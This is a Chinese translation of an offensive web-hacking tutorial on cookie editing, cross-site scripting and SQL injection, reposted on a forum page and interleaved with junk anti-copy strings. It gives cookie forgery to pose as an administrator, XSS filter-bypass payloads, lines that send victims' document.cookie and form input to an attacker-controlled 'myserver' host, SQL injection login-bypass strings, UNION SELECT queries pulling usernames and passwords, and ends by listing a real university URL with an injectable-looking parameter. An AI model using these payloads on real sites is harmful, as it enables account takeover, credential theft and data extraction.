XSS & SQL注入

admin

XSS & SQL注入
; K. N9 l/ x9 u8 W文章作者：CyberPhreak
# z$ g3 H9 Y4 t. P( L译文作者：黯魂 [S.S.T]

* r  z$ A. y6 l0 v2 N
- Z; ?' \0 [- e0 r4 fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


. \8 I2 R6 F8 Q. N2 W~介绍
9 }7 R: C7 {( w$ B. p$ b
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.
! {* q8 V" Q8 |8 H
XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
" p9 e. K3 S7 ^; d- P- SXXXXXXXXXXXXXXXXXXXXX
' S, Q" i' |/ S* ?8 M* Q
XXXXXXXXXXXXXXXXXXXX
$ X. F  E! d  z- A% JX Cookie Editing X
7 q3 Q+ L! c& l$ @$ b. t, }X XSS X
! l5 X' T) t8 ?2 WX SQL Injection X
XXXXXXXXXXXXXXXXXXXX

~什么是cookie

( C8 L' ^+ Q0 t+ r1 ?6 r' [& _cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
/ H' f9 s" R! s
~警告&欺骗

8 Q6 E5 O* P9 B  F, k# e5 p% e那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
" P/ z* j  D$ |; l" v
6 `0 }5 a9 d6 n" Fstrusername=cnsst;strpassword=cnsst
- f: e0 K' B; Y& b0 T3 {
此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...

~什么是XSS

/ C: Z0 t; g3 dXSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

$ \5 m7 u2 Z/ p% f~为什么使用XSS
7 P; J8 ?& h/ R: ?9 _3 m8 y
很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
% G2 {+ w5 B: n& n/ o. \
& k$ _7 R; ]. [~让我们开始吧…

我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

( T% ^# M/ k% h9 W) y: |XSS--跨站脚本&lt;html&gt;

; U: d: h' R  @$ Z- p5 r( `4 o&lt;body&gt;

&lt;form action="" method="GET"&gt;
! Z' O# |- X0 v% y" A+ B) C
&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;
$ Y$ n0 g& i# T% e
% i. S. n( L! p: g6 Q8 hScript: &lt;input name="name" type="name"&gt;

2 Y- P9 F9 N* s( N, ^0 v# F+ \&lt;input type="submit" value="submit"&gt;

9 Y8 a4 d9 @1 N&lt;/form&gt;

&lt;/body&gt;

&lt;/html&gt;
* }' v1 L5 r& r2 X& [6 o

4 [* G6 P5 c: J2 u# ]6 _+ B
&lt;?php

$name = $_GET['name'];

5 B9 X2 F) H% r$ N* ?! h/ cecho("Hello $name");

?&gt;
' b3 R/ K# l; K: H0 w复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

% v/ n% z6 x5 f1 g8 \/ D7 m' O+ scnsst
6 |7 P$ Z9 J" p1 Q5 ?2 K"Hello cnsst!"

- }* b* g& Q- m' T6 W3 m& i# v9 O# w9 h引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>

4 B0 O4 k+ r1 p% \3 l那么它将会弹出document.cookie!所以它是易受XSS攻击的!

现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

) P$ D7 o; r: [  H服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

: D& `' A# O! o5 p8 R0 R/ j1 A已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
& H' O  `: N% Z
  G5 k! {, k) C让我们看一个稍微复杂点的例子!
' `8 h  J2 b0 e* W9 u
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
2 S$ w8 N0 G8 v# @3 Z( y* `7 z- Vscriptalert(document.cookie)/script
或者可能是这样的:
" ]" x& Y3 m7 N, _7 m) [9 `scriptalertdocument.cookie/script

可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

让我们继续利用:
<<script>>alert(document.cookie)<</script>>
! f. u8 u# C8 Y7 T* f' [
+ o5 x/ }" ~6 M/ U& \1 N你的输出将弹出document.cookie.
- g3 f+ [2 L0 ~( u0 N1 |
3 R! L( |6 M6 k' ?. a. v: s现在来看看更狠的:
6 D9 h2 x: V3 e; B& O<<script>>alert((document.cookie))<<//script>>
. l1 `( G+ r0 K
( J" ^/ D- L* A6 R, P% B9 u( S
/ ?( O# j6 N* X3 f他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
: r8 O) S- G. R! }  pscriptalertdocument.cookie/script
$ H- {- N2 q8 u/ P或者 <<<script>>>alert(document.cookie)<<</script>>>  
+ P. @7 v. _0 w7 A8 Y& G( i5 m/ @
' z8 m" C& c6 P* y; a3 ^/ i他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
& Q9 u- h& ^4 ]# w+ _, }* ?; k8 O* N# Q
: G9 r* l  A3 d输出像这样:srplert(document.cookie)srp

) M' r! P: W% X仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>
! q! r# T. D* o% }" |* z+ u
所有重复多余的部分刚好被替换!现在让我们来点更高级的!

这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
" y" U* m/ |, p! |) w! [& d<script>alert(document.cookie)</script>

输出将是:
scriptalert(document.cookie)script

% D& ]6 i  i; j+ L/ H) L, o2 K看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
<<script>>alert(document.cookie)<</script>>
# U  Z3 \- O1 N
; p! M2 Z$ A+ u; b" W0 B输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

<
script
# [5 {* B: Z6 d4 m/ K>
' u6 W0 E7 }$ E5 g8 kalert
/ F( G" S6 s* n" D(
- b( q6 Y6 Z0 f2 f+ Kdocument
.
cookie
)
<
/
  S% K: @+ t, u4 @- t* _script
>
; g& E; G  J* h4 A

看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
+ |" J3 d$ j& x; ?  qs
+ C* `% y5 M' ~3 cc
  ?+ R: J$ y' ^/ U- P0 G  |r
i
p
4 ]: G0 c! T' K1 At
>
a
+ i$ Q7 o4 F8 a. \l
/ V9 H; q; O0 q$ ~+ a; {e
# h7 X) x% n# E( i4 d/ yr
! h, W. M1 u( kt
; ?9 ]$ B3 \8 H) G2 C" B9 z1 ~(
d
/ n; D3 h' E# l. Uo
c
u
$ w4 ?: Z0 A$ c; h7 R9 o$ s% bm
e
+ d1 \( A" N  g7 `/ _' kn
' }. D  ~8 V* m: Nt
2 x4 _, A& B+ M8 U- W- T' _.
c
5 h$ B; m4 W: ~5 e$ vo
9 Y, l6 D& _3 Jo
k
i
9 u) S. j' y9 [/ B6 M: E* o! F7 A6 Ee
0 f( w2 e4 W& A6 S3 i2 y9 L, C)
! R$ Y: [& u7 ]<
/
  F5 C( U1 D+ zs
c
r
i
p
  [2 ^% j, g8 F3 x# ?* et
/
>

4 A' J/ t( J$ i2 X* N. I这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
2 Z" V8 b5 H% o; j
还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

/ c3 N( N" g4 p* S7 Y; d5 _! _首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
* s. l5 g! k3 L" T$ Z这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
$ W3 E. E5 m7 e, u6 ^
再次假设你在网站上注册了一个帐号,并且可以自定义资料...
  o# k( u6 }7 q, }& L" Pdocument.images(0).src="http://myserver/cookie.php"+document.cookie.
或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
javascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.
, Y! W" _9 l# M8 U4 z
有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
+ p( N. k" L! L: P2 x7 _5 [User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
7 m) Q% H6 H& I! t" GReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入
3 Z7 i# j  t& ~1 S
SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

&lt;body&gt;
1 v# w7 f5 d6 k, O% ^! p
&lt;form action="" method="POST"&gt;
, |, R8 }6 T: K; o
Username: &lt;input name="name" type="name"&gt;
, w; S/ J/ J: ]: i  Q! C; k4 h
/ I- t( ]4 m& [- l( W4 ePassword: &lt;input name="password" type="password"&gt;

&lt;input type="submit" type="submit" value="Submit"&gt;

&lt;/form&gt;

& ?5 O: ?- U. F1 t" H&lt;/body&gt;
: h5 |% \6 O8 \6 r) k* n
9 n0 E0 Y2 i' J# C, `% p3 N0 k+ T&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
6 L4 S7 V7 o5 l1 N. ~# R
最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
'OR 1=1--
'OR a=a--
& |% [6 x; Z$ ~( q# L'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

& A# b: b; p) f$ O. J) a0 _# h'OR''='
% s5 C& K7 H% ]# }/ j'OR"="
'OR'="
'OR '="
; e% u7 ]- q% ~% Q4 j, K'OR "='
'OR ''='
. Z9 D" s8 O) w2 [! W# o% y'OR '=''
'OR "=''
3 C9 |) V5 g9 E3 [* p" L8 K- G'OR ''="
5 U( I; W5 d1 {5 V, c" z/ c
+ X- B5 i9 N- V! J. `
~
, e6 I% U: e$ C现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

这个查询语句将执行,但是….如果毫无作用呢?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
: |+ q. L# u! }) w- W4 SAND password='OR "='
9 y% s+ j2 I7 S- Z
7 _8 K4 u) ]& Y3 t' [4 N  [你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.
8 ?: C0 y! _6 e$ X5 u3 {
一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
. f1 c. E3 l& x9 T2 `' e( SUNION ALL SELECT
: x* y7 n( Q. ?$ g- m: k# eip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

: }1 V: J% f9 ]! ?现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='


& }8 A* L* ~, z现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
. }$ g7 c- i( d9 `* }+ @# Thttp://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
& v* _8 L, y% J/ ?, Bhttp://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
1 V2 X' h6 y# [- P' W5 thttp://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
$ w7 Y$ @, v6 D# [2 mhttp://example.com/index.php?article='OR '=''
http://example.com/index.php?article='OR''='
8 R/ i( r0 k7 j# ~2 F2 \( B. lhttp://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='
, [# b- b( i3 N! z1 q. M
尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704